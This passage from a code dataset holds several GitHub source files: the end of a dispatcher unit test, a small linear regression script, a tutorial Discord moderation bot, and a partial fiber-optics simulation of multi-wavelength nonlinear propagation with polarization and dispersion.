self.assertEquals(2, resp2[0].get('sink'), 'Sink value wrong.')\n\n client3.send([header3, payload3])\n resp3 = client3.recv()\n\n # Checking handling of third client\n self.assertEquals('3', handlers[3]._header['source'])\n self.assertEquals('True', handlers[3]._header['payload'])\n self.assertEquals(payload3[0], handlers[3]._payload[0])\n self.assertEquals(payload3[1]**3, handlers[3]._payload[1])\n self.assertEquals(payload3[2]**3, handlers[3]._payload[2])\n # Receing response from handler3\n self.assertEquals(3, resp3[0].get('sink'), 'Sink value wrong.')\n\n control = DefaultChannel('ipc:///tmp/control.ipc')\n control.connect()\n control.send([{'action': 'terminate'}])\n control.close()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"michelav/cloud-detours","sub_path":"pydetours/test/dispatcher_test.py","file_name":"dispatcher_test.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"29949885615","text":"def LinearRegression():\n import pandas as pd\n import matplotlib.pyplot as plt\n from sklearn.linear_model import LinearRegression\n name_of_csv=\"cluster_all.csv\"\n df = pd.read_csv(name_of_csv)\n df.to_numpy()\n X = df['Popular_date']\n y = df['Loudness']\n X_np=X.to_numpy()\n y_np=y.to_numpy()\n X_np=X_np.reshape(-1, 1)\n 
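# scikit-learn expects 2-D feature arrays of shape (n_samples, n_features); reshape(-1, 1) turns each 1-D series into a single-feature column\n    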
y_np=y_np.reshape(-1, 1)\n    model = LinearRegression().fit(X_np, y_np)  # fit once and reuse, instead of re-fitting for every attribute\n    plt.plot(X_np, y_np)\n    plt.scatter(X_np, y_np)\n    R_squared = model.score(X_np, y_np)\n    print(R_squared)\n    \n    return plt.plot(X_np, model.coef_*X_np + model.intercept_)","repo_name":"Jingxue-24/QM2-team9","sub_path":"LinearRegression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"41503069781","text":"# main.py\nimport discord\nfrom discord.ext import commands\nimport json\n\nwith open('./config.json', 'r') as cjson:\n    config = json.load(cjson)\n\nprefix = config[\"settings\"][\"prefix\"]\nclient = commands.Bot(command_prefix=prefix)\nclient.remove_command(\"help\")\n\n@client.event\nasync def on_ready():\n    print(f\"{client.user} has connected to Discord\")\n\n@client.command()\nasync def ping(ctx):\n    embed = discord.Embed()\n    embed.add_field(name=\"Champ\", value=\"Poggers\")\n    embed.set_footer(text=\"Memers\")\n    await ctx.channel.send(embed=embed)\n@client.command()\n@commands.has_permissions(ban_members = True)\nasync def ban(ctx, member: discord.Member, *, reason=None):\n    await member.ban(reason=reason)\n    await ctx.channel.send(\"The member has been banned from the server\")\n@client.command()\n@commands.has_permissions(kick_members = True)\nasync def kick(ctx, member: discord.Member, *, reason=None):\n    await member.kick(reason=reason)\n    await ctx.channel.send(\"The member has been kicked from the server\")\n@client.command()\nasync def help(ctx):\n    embed=discord.Embed()\n    embed.add_field(name=\"Help\", value=\"Welcome to the help of the tutorial bot\")\n    embed.add_field(name=\"kick <@user> \", value=\"Kicks the user from the server\")\n    embed.add_field(name=\"ban <@user> \", value=\"Bans the user from the server\")\n    await ctx.channel.send(embed=embed)\n\nclient.run(config[\"token\"])","repo_name":"Smirf123/discordpytutorial","sub_path":"Pt 3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"16611544868","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 23 13:28:33 2020\n\n@author: Bruger\n\"\"\"\n\n\n\n\n#In this script, I try to model the effect of multiple frequencies of light inside the NL medium. \n#For random birefringence, I reuse modified code taken from Agrawal, specifically chapter 7.4. 
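\n# Conventions below: the strong tone at lambda1 plays the role of the pump (n=-1) and the weak tone at lambda2 the signal (n=0); four-wave-mixing sidebands are then picked out with getSideband.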
\n\n\n#Import Math libraries\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nimport scipy.fftpack\nimport scipy.optimize\nfrom scipy.fftpack import fft, ifft, fftshift,ifftshift\n\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n#Define pi for convenience\nglobal pi; pi=np.pi \n\n\n# import py_pol as ppp\n# from py_pol import degrees, np\n# from py_pol.stokes import Stokes\n# from py_pol.mueller import Mueller\n# from py_pol.drawings import draw_poincare_sphere, draw_on_poincare\n\nimport random\n\n\n#Import the custom gif library to make animations of results\n#import gif\n###\n\n\n#Specify custom style for plots\nplt.rcParams.update({'font.size': 14})\nplt.rcParams.update({'lines.linewidth': 5})\n\ndef f2lBW(DeltaF,lamb_c):\n return DeltaF*lamb_c**2/c\n\ndef l2fBW(DeltaL,freq_c):\n return freq_c**2/c*DeltaL\n\n\n\ndef getPhase(a): #Returns the local phase\n \n \n phi= np.angle(a)\n phi=(phi + 2 * np.pi) % (2 * np.pi)\n phi=np.unwrap(phi)\n \n \n #phi=np.cumsum(phi)/2/pi\n phi=phi-phi[int(np.floor(len(phi)/2))]\n return (phi)\n\ndef getChirp(t,a): #Note: Time must be in s\n \n phase=getPhase(a)\n step=np.diff(t)\n dummy=np.diff(phase)\n dummy=-1.0*np.append(dummy[0]-(dummy[1]-dummy[0]),dummy)/(step[0])/2/pi #Return the local chirp in Hz\n \n return dummy\n\n#Define function to obtain the frequency spectrum of a pulse\n#Define function to obtain the frequency spectrum of a pulse\ndef getSpectrumFromPulse(t,a):\n \n Energy1=np.round(pulseEnergy(t,a),5) #Find energy of pulse\n n=len(t) #length of time vector\n dt=t[1]-t[0] #Length of time step\n f = fftshift(scipy.fftpack.fftfreq(n, d=dt)) #Generate frequencies\n A0ff0=fftshift((fft(a[0])))*(dt) #Take FFT of pulse to get frequencies\n A0ff1=fftshift((fft(a[1])))*(dt) #Take FFT of pulse to get frequencies\n \n output=np.array([A0ff0,A0ff1])\n Energy2=np.round(spectralEnergy(f,output),5) #Determine total energy of spectrum\n\n if Energy1 != Energy2: #Verify that energy has not been lost\n print(\"Warning energy was lost when converting from pulse to spectrum\")\n print('Spectral energy ='+str(Energy2))\n print('Pulse energy ='+str(Energy1))\n \n assert(Energy1==Energy2) \n assert(Energy1==Energy2)\n \n return f,output\n \n#Define a function to get the pulse corresponding to a certain spectrum\ndef getPulseFromSpectrum(f,af):\n \n Energy2=np.round(spectralEnergy(f,af),5) #Energy of spectrum\n \n n=len(f) #Length of list of requencies\n df=f[1]-f[0] #Frequency step\n t = ifftshift(scipy.fftpack.fftfreq(n, d=df)) #generate time trace\n A0=scipy.fftpack.ifft(ifftshift((af[0])))/(t[1]-t[0])# Take FFT of spectrum to get pulse (NEED TO BE iFFT?)\n A1=scipy.fftpack.ifft(ifftshift((af[1])))/(t[1]-t[0])# Take FFT of spectrum to get pulse (NEED TO BE iFFT?)\n \n #A = np.divide(A[-np.arange(A.shape[0])],s.shape[-1])\n output=np.array([A0,A1])\n Energy1=np.round(pulseEnergy(t,output),5) #Energy of pulse\n \n #Compare energies\n if Energy1 != Energy2:\n print(\" \")\n print(\"Warning energy was lost when converting from spectrum to pulse\")\n print('Spectral energy ='+str(Energy2))\n print('Pulse energy ='+str(Energy1))\n print(\" \")\n \n assert(Energy1==Energy2)\n assert(Energy1==Energy2)\n return t,output #Return times and pulse [::-1]\n \n#Define a box of height 1 centered at t0 and width w\ndef box(t,t0,w):\n out=np.ones_like(t)*1e-100\n \n i=0\n for ts in t:\n if np.abs(ts-t0)<=w/2:\n out[i]=1\n i=i+1 \n return out\n\ndef pulsePower(a):\n return np.abs(a[0])**2+np.abs(a[1])**2\n\ndef 
pulseEnergy(t,a): #Determines the energy of the input pulse in [J] if given a time vector in [s] and pulse in units of sqrt(W)\n return np.trapz(pulsePower(a),t)\n\ndef spectralPower(af):\n return np.abs(af[0])**2+np.abs(af[1])**2\n\ndef spectralEnergy(f,af): #Takes a list of frequencies [Hz] and a spectrum in sqrt(W/Hz) and returns total energy\n \n return np.trapz(spectralPower(af),f)\n \n\n\ndef GaussianPulse(t,A,T0,s,c,pol): #Function used to define a Gaussian pulse\n \n \n amplitude=A*np.exp(-(t-T0)**2/(2*s**2))+c\n return np.array([pol[0]*amplitude,pol[1]*amplitude])\n\ndef GaussianSpectrum(omega,Aw,w0,sw,cw): #Function used to define a Gaussian spectral line.\n return Aw*np.exp(-(omega-w0)**2/(2*sw**2))+cw\n\n\ndef getSideband(freq,spectrum,fs,fp,n):\n fd=np.abs(fp-fs)\n boxfilt=box(freq,fp+(n+1)*fd,fd/5)\n return np.array([spectrum[0]*boxfilt,spectrum[1]*boxfilt])\n\n\ndef getStokes(pulse):\n S0=pulsePower(pulse)\n S1=(np.abs(pol2[0])**2-np.abs(pol2[1])**2)*np.ones_like(pulse[0])/S0\n S2=2*np.real(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse[0])/S0\n S3=-2*np.imag(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse[0])/S0\n \n return np.array([S0/np.max(S0),S1,S2,S3])\n\n\n###### Define plot parameters #####\n \nglobal gifsize\ngifsize=75\n\n\n############### Define constants #######################\nc=3e8 #Speed of light\n\nrounding=3 #Number of decimals we want to round to\n\n\n############### Define simulation parameters ###############\nglobal nt\nnt=2024*100*4 #FFT points\n\nprint(\" \")\nprint(\"For the FFT, we will use a total of nt=\"+str(nt)+' points.')\nprint(\" \")\n\nglobal step_num\nstep_num=round(100) #No. of z-steps\n\ndispersion_on=0#5e8\nNL_on=1\nBiref_on=0\nrandom.seed(126)\n\n\nsidebandnumber=1\n\nprint(\" \")\nprint(\"The number of steps in solving the NLSE will be \"+str(step_num))\nprint(\" \")\n \n\n\n############### Fiber parameters #######################\nglobal distance\ndistance=2000 #Distance in meters\ngamma=1*0.001#Gamma in /W/m\nalpha=0 #Loss in db/LD\nPcr=1/(gamma*distance)\nprint(\"The critical power of the fiber P_cr=\"+str(Pcr)+'W')\n\nglobal deltaz\ndeltaz=distance/step_num\n\n\n\nprint(\" \")\nprint(\"The fiber is divided into N=\"+str(step_num)+' segments.')\nprint(\"The length of the fiber is \"+str(distance/1e3)+'km')\nprint(\"Each step has a length of \"+str(np.round(deltaz,rounding))+' m')\nprint(\" \")\n\n################ Spectral components ############################\n\n\n#Peak powers of pulses in units of [W]\npower1=1.84*Pcr #Pump corresponding to n=-1\npower2=0.10*Pcr #Signal corresponding to n=0\npower3=0.0\npower4=0.0\npower5=0.0\npower6=0.0\npower7=0.0\npower8=0.0\npower9=0.0\n\npowerlist=np.array([power1,power2,power3,power4,power5,power6,power7,power8,power9])\nprint(\" \")\nprint(\"The pulse powers are:\")\nprint(str(powerlist)+'[W]')\nprint(\" \")\nprint(\"The pulse power relative to P_cr ([dBc]) are:\")\nprint(str(10*np.log10(powerlist/Pcr)))\n\n\n#Polraization angle\ntheta1=45 #X/Y pol of pump\ntheta2= 0 #X/Y pol of signal\ntheta3=45 \ntheta4=45 \ntheta5=45 \ntheta6=45 \ntheta7=45 \ntheta8=45 \ntheta9=45 \n\n\n#Phase delay between x and y comp for (phi=90, theta=45 => circular polarization) \nphi1= 0 #90 \nphi2= 0 #90 \nphi3=90 #90 \nphi4=90 #90 \nphi5=90 #90 \nphi6=90 #90 \nphi7=90 #90 \nphi8=90 #90 \nphi9=90 #90 \n\n#Overall phase delay\ndelta1=0\ndelta2=0 \ndelta3=180 \ndelta4=180 \ndelta5=180 \ndelta6=180 \ndelta7=180 \ndelta8=180 \ndelta9=180 \n\ndegrees=pi/180\n\n#Jones 
vectors\npol1=np.array([np.cos(theta1*degrees),np.sin(theta1*degrees)*np.exp(1j*phi1*degrees)])*np.exp(1j*delta1*degrees)\npol2=np.array([np.cos(theta2*degrees),np.sin(theta2*degrees)*np.exp(1j*phi2*degrees)])*np.exp(1j*delta2*degrees)\npol3=np.array([np.cos(theta3*degrees),np.sin(theta3*degrees)*np.exp(1j*phi3*degrees)])*np.exp(1j*delta3*degrees)\npol4=np.array([np.cos(theta4*degrees),np.sin(theta4*degrees)*np.exp(1j*phi4*degrees)])*np.exp(1j*delta4*degrees)\npol5=np.array([np.cos(theta5*degrees),np.sin(theta5*degrees)*np.exp(1j*phi5*degrees)])*np.exp(1j*delta5*degrees)\npol6=np.array([np.cos(theta6*degrees),np.sin(theta6*degrees)*np.exp(1j*phi6*degrees)])*np.exp(1j*delta6*degrees)\npol7=np.array([np.cos(theta7*degrees),np.sin(theta7*degrees)*np.exp(1j*phi7*degrees)])*np.exp(1j*delta7*degrees)\npol8=np.array([np.cos(theta8*degrees),np.sin(theta8*degrees)*np.exp(1j*phi8*degrees)])*np.exp(1j*delta8*degrees)\npol9=np.array([np.cos(theta9*degrees),np.sin(theta9*degrees)*np.exp(1j*phi9*degrees)])*np.exp(1j*delta9*degrees)\n\n\n\n#Field amplitudes of pulses in units of [sqrt(W)]\nampllist=np.sqrt(powerlist)\nprint(\" \")\nprint(\"The field amplitudes are:\")\nprint(str(np.round(ampllist,rounding))+'[sqrt(W)]')\n\n\n\n#Wavelengths of spectral components:\n\nlambda1=(1550+0.07)*1e-9# Wavelength in m #Pump\nlambda2=(1550-0.07)*1e-9# Wavelength in m #Signal\n\nlambda3=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda4=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda5=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda6=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda7=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda8=1300.0e-9#1272.6e-9 #Wavelength in m\nlambda9=1300.5e-9#1273.3e-9 #Wavelength in m\n\nlambdalist=np.array([lambda1,lambda2,lambda3,lambda4,lambda5,lambda6,lambda7,lambda8,lambda9])\nprint(\" \")\nprint('The wavelengths are')\nprint(str(np.round(lambdalist*1e9,rounding))+'[nm]')\n\n\n\n#Define angular frequencies\nomegalist=c*2*pi/lambdalist\nprint(\" \")\nprint('The angular frequencies are')\nprint(str(np.round(omegalist/1e12,rounding))+'[2pi*THz]')\n\n\nwm=np.abs(omegalist[0]+omegalist[1])/2\nws=np.abs(omegalist[0]-omegalist[1])\n\nfm=wm/2/pi\nfs=ws/2/pi\n\n\n\n#Define actual frequencies\nfreqlist=omegalist/2/pi\nprint(\" \")\nprint('The frequencies are')\nprint(str(np.round((freqlist+fm)/1e12,rounding))+'[THz]')\n\n\nOmegaDiffMax=np.max(omegalist)-np.min(omegalist)\n\n\n#Define spectral widths in units of [Hz] of field components \n\nsw1=0.01e9\nsw2=0.01e9 \nsw3=0.01e9 \nsw4=0.01e9 \nsw5=0.01e9 \nsw6=0.01e9 \nsw7=0.01e9 \nsw8=0.01e9 \nsw9=0.01e9 \n\nswlist=np.array([sw1,sw2,sw3,sw4,sw5,sw6,sw7,sw8,sw9])\nprint(\" \")\nprint('The spectral widths are')\nprint(str(np.round(swlist/1e6,rounding))+'[MHz]')\n\nlwlist=f2lBW(swlist,lambdalist)\nprint(\" \")\nprint('The wavelength widths are')\nprint(str(np.round(lwlist*1e12,rounding))+'[pm]')\n\n\n\n#Gaussian pulse widths in [s]\nTlist=1/2/pi/swlist\nprint(\" \")\nprint('The pulse widths are')\nprint(str(np.round(Tlist*1e9,rounding))+'[ns]')\n\nAwlist=ampllist*np.sqrt(2*pi)*Tlist\n\nprint(\" \")\nprint(\"The spectral amplitudes are:\")\nprint(str(np.round(Awlist*1e6*1e3,rounding))+'[sqrt(uW/THz)]')\nprint(\" \")\n\nprint(\" \")\nprint(\"The spectral peaks are:\")\nprint(str(np.round(Awlist**2*1e12*1e6,rounding))+'[uW/THz]')\nprint(\" \")\n\n\n\n\nt1=0\nt2=0\nt3=0\nt4=0\nt5=0\nt6=0\nt7=0\nt8=0\nt9=0\n\ntlist=np.array([t1,t2,t3,t4,t5,t6,t7,t8,t9])\n\nprint(\" \")\nprint(\"The starting times for the pulses 
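# Hedged refactoring sketch (hypothetical helper, not in the original):
# the nine Jones vectors above all follow one pattern, so they could be
# built from (theta, phi, delta) in degrees; np.radians is used here to
# avoid shadowing the script's own `degrees = pi/180` constant:
def jones_vector(theta, phi, delta):
    th, ph, de = np.radians([theta, phi, delta])
    return np.array([np.cos(th),
                     np.sin(th) * np.exp(1j * ph)]) * np.exp(1j * de)

# e.g. jones_vector(theta1, phi1, delta1) reproduces pol1 to floating precision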
are\")\nprint(str(np.round(tlist*1e9,rounding))+'[ns]')\n\n\n\n\n\n\n#### Determining the dispersion ###\n\n#We do this by opening a separate data file I generated to get the beta_2 parameter for a regular SMF.\ncolnames=['lspace', 'b2'] \n\ndf=pd.read_csv('lspaceVSbeta2.csv', names=colnames, header=1) \nlspace=df[\"lspace\"]\nb2=df[\"b2\"]\n\nlspace=lspace/1e6 #Convert into m\nb2=b2*1e-24 #Convert in to s^2/m\n\nwspace=c*2*pi/lspace\n \n\nf3l = interp1d(lspace, b2, kind='cubic') #Functions for obtaining beta2 when given wavelength of angular freq.\nf3w = interp1d(wspace, b2, kind='cubic')\n\nlambdaspace=np.linspace(1200e-9,1300e-9,10000)\npp=f3l(lambdaspace)\ni0=np.argmin(np.abs(pp))\nl0=lambdaspace[i0]\n\nplt.figure()\nplt.title('Dispersion vs. Wavelength')\nplt.plot(lspace*1e9,b2*1e24)\n#plt.plot(lambdalist[0]*1e9,f3l(lambdalist[0])*1e24,'r.')\nplt.plot(lambdalist*1e9,f3l(np.array(lambdalist))*1e24,'r.',markersize=12)\nplt.xlabel('Wavelength [nm]')\nplt.ylabel('beta2 [ps^2/m]')\nplt.grid()\nplt.axis([1200,1500,-50,5])\n#plt.axis([np.min(lambdalist)*1e9-0.5,np.max(lambdalist)*1e9+0.5,np.min(f3l(lambdalist)*1e24)-0.5,np.max(f3l(lambdalist)*1e24)+0.5])\nplt.show()\n\n#w1=c*2*pi/wl2\n#w2=c*2*pi/wl1\n\nplt.figure()\nplt.title('Dispersion vs. Frequency')\nplt.plot(wspace/2/pi/1e12,b2*1e24)\nplt.plot(wspace/2/pi/1e12,f3w(wspace)*1e24)\nplt.plot((omegalist+wm)/2/pi/1e12,f3w(omegalist+wm)*1e24,'r.',markersize=12)\nplt.xlabel('Frequency [THz]')\nplt.ylabel('beta2 [ps^2/m]')\nplt.grid()\nplt.axis([np.min((omegalist+wm)/2/pi)/1e12*0.9999,np.max((omegalist+wm)/2/pi)/1e12*1.0001,np.min(f3w(omegalist+wm))*1e24*0.9999,np.max(f3w(omegalist+wm))*1e24*0.9998])\nplt.show()\n\n\n\nLd=Tlist**2/np.abs(f3w(omegalist+wm)*dispersion_on)\n\nprint(\" \")\nprint(\"The dispersion lengths for the pulses are\")\nprint(str(np.round(Ld/1e3,rounding))+'[km]')\nprint(\" \")\n\nLNL=1/(gamma*powerlist*NL_on)\nprint(\" \")\nprint(\"The NL lengths for the pulses are\")\nprint(str(np.round(LNL/1e3,rounding))+'[km]')\nprint(\" \")\n\n\n\n\n#Define the angular frequencies used for the FFT\nmx=np.max((omegalist))\nmi=np.min((omegalist))\nomega=np.linspace(-20*ws,20*ws,nt) #Defines a list of frequencies centered between the two main frequencies\nglobal freq\nfreq=omega/2/pi\nllambda=c*2*pi/omega\n\nfplot=(freq)/1e12\n\ndw=omega[1]-omega[0]\ndf=dw/2/pi\n\n\nprint(\" \")\nprint(\"The list of frequencies extends from \"+str(np.min(freq)/1e12)+'[THz] to '+str(np.max(freq)/1e12)+'[THz].')\nprint(\"That is a range of \"+str((np.max(freq)-np.min(freq))/1e9)+'[GHz]')\nprint(\"The frequency resolution is \"+str(df/1e6)+'[MHz]')\nprint(\" \")\nprint(\"In terms of wavelengths:\")\nprint(\"The list of wavelengths extends from \"+str(np.min(llambda)*1e9)+'[nm] to '+str(np.max(llambda)*1e9)+'[nm].')\nprint(\"That is a range of \"+str((np.max(llambda)-np.min(llambda))*1e9)+'[nm]')\nprint(\"The wavelength resolution is \"+str((llambda[0]-llambda[1])*1e15)+'[fm]')\nprint(\" \")\n\nTmax=1/df\nglobal dt\ndt=Tmax/nt\nglobal tau\ntau=np.arange(-nt/2,nt/2)*dt\n\nprint(\" \")\nprint(\"The time range extends from \"+str(np.min(tau)*1e9)+'[ns] to '+str(np.max(tau)*1e9)+'[ns].')\nprint(\"That is a range of \"+str((np.max(tau)*1e9-np.min(tau)*1e9))+'[ns]')\nprint(\"And just to confirm, Tmax=1/df=\"+str(Tmax*1e9)+'[ns]')\nprint(\"The time resolution is dt=\"+str(dt*1e12)+'[ps]')\n\nprint(\" \")\nprint(\"The time range is \"+str(Tmax*1e9)+'ns')\nprint(\"The time resolution is \"+str(dt*1e9)+'ns')\nprint(\" \")\n\nprint(\"Generating spectra for each 
pulse\")\n\n### Generate the spectra for the various frequency components ###\n#Spec1=GaussianSpectrum(freq,Awlist[0],freqlist[0],swlist[0],0)\n#Spec2=GaussianSpectrum(freq,Awlist[1],freqlist[1],swlist[1],0)\n#Spec3=GaussianSpectrum(freq,Awlist[2],freqlist[2],swlist[2],0)\n#Spec4=GaussianSpectrum(freq,Awlist[3],freqlist[3],swlist[3],0)\n#Spec5=GaussianSpectrum(freq,Awlist[4],freqlist[4],swlist[4],0)\n#Spec6=GaussianSpectrum(freq,Awlist[5],freqlist[5],swlist[5],0)\n#Spec7=GaussianSpectrum(freq,Awlist[6],freqlist[6],swlist[6],0)\n#Spec8=GaussianSpectrum(freq,Awlist[7],freqlist[7],swlist[7],0)\n#Spec9=GaussianSpectrum(freq,Awlist[8],freqlist[8],swlist[8],0)\n#\n#print(\" \")\n#print(\"Adding up the spectra into a total spectrum\")\n#Add them all up to a total spectrum\n#Spectot=Spec1+Spec2+Spec3+Spec4+Spec5+Spec6+Spec7+Spec8+Spec9\n#Spectot0=Spec1+Spec2+Spec3+Spec4+Spec5+Spec6+Spec7+Spec8+Spec9 #Copy of initial spectrum\n\nprint(\" \")\nprint(\"Generating pulses from individual spectra\")\n### Generate pulses for each spectrum ###\n#dasd,pulse1=getPulseFromSpectrum(freq,Spec1)\n#dasd,pulse2=getPulseFromSpectrum(freq,Spec2)\n#dasd,pulse3=getPulseFromSpectrum(freq,Spec3)\n#dasd,pulse4=getPulseFromSpectrum(freq,Spec4)\n#dasd,pulse5=getPulseFromSpectrum(freq,Spec5)\n#dasd,pulse6=getPulseFromSpectrum(freq,Spec6)\n#dasd,pulse7=getPulseFromSpectrum(freq,Spec7)\n#dasd,pulse8=getPulseFromSpectrum(freq,Spec8)\n#dasd,pulse9=getPulseFromSpectrum(freq,Spec9)\n\npulse1=GaussianPulse(tau,ampllist[0],tlist[0],Tlist[0],0,pol1)*np.exp(1j*((omegalist[0]-wm)*tau))\npulse2=GaussianPulse(tau,ampllist[1],tlist[1],Tlist[1],0,pol2)*np.exp(1j*((omegalist[1]-wm)*tau))\npulse3=GaussianPulse(tau,ampllist[2],tlist[2],Tlist[2],0,pol3)*np.exp(1j*(-(omegalist[2]-wm)*tau))\npulse4=GaussianPulse(tau,ampllist[3],tlist[3],Tlist[3],0,pol4)*np.exp(1j*(-(omegalist[3]-wm)*tau))\npulse5=GaussianPulse(tau,ampllist[4],tlist[4],Tlist[4],0,pol5)*np.exp(1j*(-(omegalist[4]-wm)*tau))\npulse6=GaussianPulse(tau,ampllist[5],tlist[5],Tlist[5],0,pol6)*np.exp(1j*(-(omegalist[5]-wm)*tau))\npulse7=GaussianPulse(tau,ampllist[6],tlist[6],Tlist[6],0,pol7)*np.exp(1j*(-(omegalist[6]-wm)*tau))\npulse8=GaussianPulse(tau,ampllist[7],tlist[7],Tlist[7],0,pol8)*np.exp(1j*(-(omegalist[7]-wm)*tau))\npulse9=GaussianPulse(tau,ampllist[8],tlist[8],Tlist[8],0,pol9)*np.exp(1j*(-(omegalist[8]-wm)*tau))\n\nprint(\" \")\nprint(\"Adding them up to a total pulse\")\n### Generate total pulse from total spectrum ###\n#dasd,Pulsetot=getPulseFromSpectrum(freq,Spectot)\n#dasd,Pulsetot0=getPulseFromSpectrum(freq,Spectot)\n\nPulsetot =pulse1+pulse2+pulse3+pulse4+pulse5+pulse6+pulse7+pulse8+pulse9\nPulsetot0=pulse1+pulse2+pulse3+pulse4+pulse5+pulse6+pulse7+pulse8+pulse9\n\nvv,Spectot=getSpectrumFromPulse(tau,Pulsetot)\nvv,Spectot0=getSpectrumFromPulse(tau,Pulsetot0)\n\n\n#Pulsetot=Pulsetot*np.exp(-1j*np.angle(Pulsetot))\n#Pulsetot0=Pulsetot0*np.exp(-1j*np.angle(Pulsetot0))\n\n\nE1=pulseEnergy(tau,pulse1)\nE2=pulseEnergy(tau,pulse2)\nE3=pulseEnergy(tau,pulse3)\nE4=pulseEnergy(tau,pulse4)\nE5=pulseEnergy(tau,pulse5)\nE6=pulseEnergy(tau,pulse6)\nE7=pulseEnergy(tau,pulse7)\nE8=pulseEnergy(tau,pulse8)\nE9=pulseEnergy(tau,pulse9)\n\nElist=np.array([E1,E2,E3,E4,E5,E6,E7,E8,E9])\nprint(\" \")\nprint(\"The energies of the pulses are\")\nprint(str(np.round(Elist*1e9,rounding))+'[nJ]')\n\nEtot=pulseEnergy(tau,Pulsetot0)\n\nprint(\" \")\nprint(\"The total pulse energy is Etot=\"+str(Etot*1e9)+' [nJ]')\nprint(\"Just to check, we also sum the individual energies=\"+str(np.sum(Elist)*1e9)+' 
[nJ]')\nprint(\" \")\n\n\n#plt.figure()\n#plt.title('Testing spectrum for individual freq. comp.')\n#plt.plot(freq/1e12,np.abs(Spec1)**2*1e12,label='E1='+str(np.round(spectralEnergy(freq,Spec1)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec2)**2*1e12,label='E2='+str(np.round(spectralEnergy(freq,Spec2)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec3)**2*1e12,label='E3='+str(np.round(spectralEnergy(freq,Spec3)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec4)**2*1e12,label='E4='+str(np.round(spectralEnergy(freq,Spec4)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec5)**2*1e12,label='E5='+str(np.round(spectralEnergy(freq,Spec5)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec6)**2*1e12,label='E6='+str(np.round(spectralEnergy(freq,Spec6)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec7)**2*1e12,label='E7='+str(np.round(spectralEnergy(freq,Spec7)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec8)**2*1e12,label='E8='+str(np.round(spectralEnergy(freq,Spec8)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec9)**2*1e12,label='E9='+str(np.round(spectralEnergy(freq,Spec9)*1e9,rounding))+'nJ.')\n#plt.xlabel('Frequency [THz]')\n#plt.ylabel('Power density [W/THz]')\n#plt.yscale('log')\n#plt.grid()\n#plt.axis([np.min(freq/1e12),np.max(freq/1e12),np.min(np.abs(Awlist)**2*1e12)*1e-6,np.max(np.abs(Awlist)**2*1e12)*10])\n#plt.legend(frameon=False)\n#plt.show()\n\n\nplt.figure()\nplt.title('Testing trace for individual freq component')\nplt.plot(tau*1e9,pulsePower(pulse1),label='E1='+str(np.round(pulseEnergy(tau,pulse1)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse2),label='E2='+str(np.round(pulseEnergy(tau,pulse2)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse3),label='E3='+str(np.round(pulseEnergy(tau,pulse3)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse4),label='E4='+str(np.round(pulseEnergy(tau,pulse4)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse5),label='E5='+str(np.round(pulseEnergy(tau,pulse5)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse6),label='E6='+str(np.round(pulseEnergy(tau,pulse6)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse7),label='E7='+str(np.round(pulseEnergy(tau,pulse7)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse8),label='E8='+str(np.round(pulseEnergy(tau,pulse8)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse9),label='E9='+str(np.round(pulseEnergy(tau,pulse9)*1e9,rounding))+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\n\n\n################ Define time and frequency arrays ###############\n\n\n\n\n\nprint(\"Plot input pulse and spectrum\") ###############\n\n\nplt.figure()\nplt.title('Total input pulse')\nplt.plot(tau*1e9,pulsePower(Pulsetot),label='E='+str(Etot*1e9)+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\nplt.figure()\nplt.title('Phase of Total input pulse')\nplt.plot(tau*1e9,getPhase(Pulsetot0[0]),label='$\\phi_x$')\nplt.plot(tau*1e9,getPhase(Pulsetot0[1]),label='$\\phi_y$')\nplt.xlabel('Time [ns]')\nplt.ylabel('Phase [rad]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\ncx=getChirp(tau,Pulsetot0[0])\ncy=getChirp(tau,Pulsetot0[1])\n\n\nfig,ax=plt.subplots()\nplt.title('Chirp of Total input pulse')\nplt.plot(tau*1e9,cx/1e12,label='$c_x$')\nplt.plot(tau*1e9,cy/1e12,label='$c_y$')\nplt.xlabel('Time [ns]')\nplt.ylabel('Local Chirp 
